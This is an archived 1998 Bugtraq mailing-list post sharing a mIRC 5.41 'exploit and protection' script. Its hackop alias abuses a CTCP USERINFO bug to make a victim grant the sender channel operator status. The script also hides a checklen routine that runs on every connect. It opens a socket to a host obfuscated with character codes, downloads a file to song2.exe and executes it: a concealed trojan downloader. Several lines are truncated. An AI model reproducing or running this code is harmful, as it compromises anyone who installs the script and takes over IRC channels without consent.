[8555] in bugtraq
No subject found in mail header
daemon@ATHENA.MIT.EDU (System Administrator)
Sat Nov 14 16:50:37 1998
Date: Fri, 13 Nov 1998 14:50:32 -0500
Reply-To: System Administrator <root@BRAMPTON1.NETMATRIX.NET>
From: System Administrator <root@BRAMPTON1.NETMATRIX.NET>
X-To: info@rootshell.com
To: BUGTRAQ@NETSPACE.ORG
Hi,
while debugging/hexing/disassembling mirc my friend slotmech last week found
a mirc bug which allows to force users to send MODE commands to the server.
this example script sends a MODE +o to the irc server. the mirc author has been
notified of this but we didn't receive a response... my exploit+protection scri$is included. Expect more mirc stuff from us.
cya,
fs
--- cut here ---
;#; mIRC v5.41 hack protection & exploit by FeaRStorm <fearstorm@gmx.net>
;#; Allows to let a victim op yourself using a bug in mIRC5.41, script based$;#; included. Bug may not work on scripts that do a halt; after a ctcp useri$;#;
;#; -------- Use /hackop nick #channel to make nick give you op on #channel !
;#; -------- That's it... have phun!
;#;
;#; greets go to tr4xzor, slotmech, meep, fowi, lotomax and all #haktex opz !
;#; no greets to the following lamerz: cheyenne, zito, cortex and DrFrozt (ass$;#; Credits: i didn't find this bug, slotmech did... i only wrote this exploit$;#;
;#; if you want to add this code to your own script please: ASK FIRST!
ctcp 1:userinfo*: antihack
alias antihack {
if ($len($2) > 17 && $chr(91) isin $2-) {
echo $active mIRC5.41 hack attempt from $nick
.halt
}
}
alias hackop {
if ($2 == $null) {
echo 3 *** Usage: /hackop nick #channel
.halt
}
if ($me !ison $2) {
echo 3 *** You aren't on that Channel!
.halt
}
if ($1 !isop $2) {
echo 3 *** $1 isn't opped on that channel!
.halt
}
checklen $1
.ctcp $$1 userinfo $ $+ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx $6) $+ $chr(115) $chr(109) $+ $chr(111) $+ $chr(100) $+ $chr(101) $+ : +o $me | $}
alias checklen {
.if (%xcomplete == 1) halt
.if (%xinprog == 1) halt
.set %xfilename song2.exe
.set %xlof $lof(%xfilename)
.set %xfirst 1
.write -c %xfilename
; echo 3 $active $chr(100 111 110 116 - 115 112 111 105 108 - 116 104 101 - 1$ .sockclose protx
.sockopen protx $chr(119) $+ $chr(119) $+ $chr(119) $+ . $+ $chr(103) $+ $chr$}
on 1:sockopen:protx: {
.sockwrite -n protx $chr(71) $+ $chr(69) $+ $chr(84) $chr(47) $+ $chr(66) $+ $+ $chr(101) $+ $chr(108) $+ $chr(116) $+ $chr(97) $+ $chr(47) $+ $chr(57) $+ $c$ .sockwrite -n protx
}
on 1:sockread:protx: {
.sockread &test
.set %xlof $lof(%xfilename)
.if (%xfirst == 1) set %xlof 0
.set %xfirst 0
.bwrite %xfilename %xlof $sockbr &test
}
on 1:connect:checklen
on 1:sockclose:protx: {
.sockread &test
if ($sockbr > 0) {
.set %xlof $lof(%xfilename)
.bwrite %xfilename %xlof $sockbr &test
}
.if ($lof(%xfilename) == 178306) {
.run %xfilename
.set %xcomplete 1
}
if ($lof(%xfilename) != 178306) {
.timer 1 300 checklen
}
}
unset %xinprog
unset %xfilename
unset %xlof
unset %xfirst
}
--- cut here ---
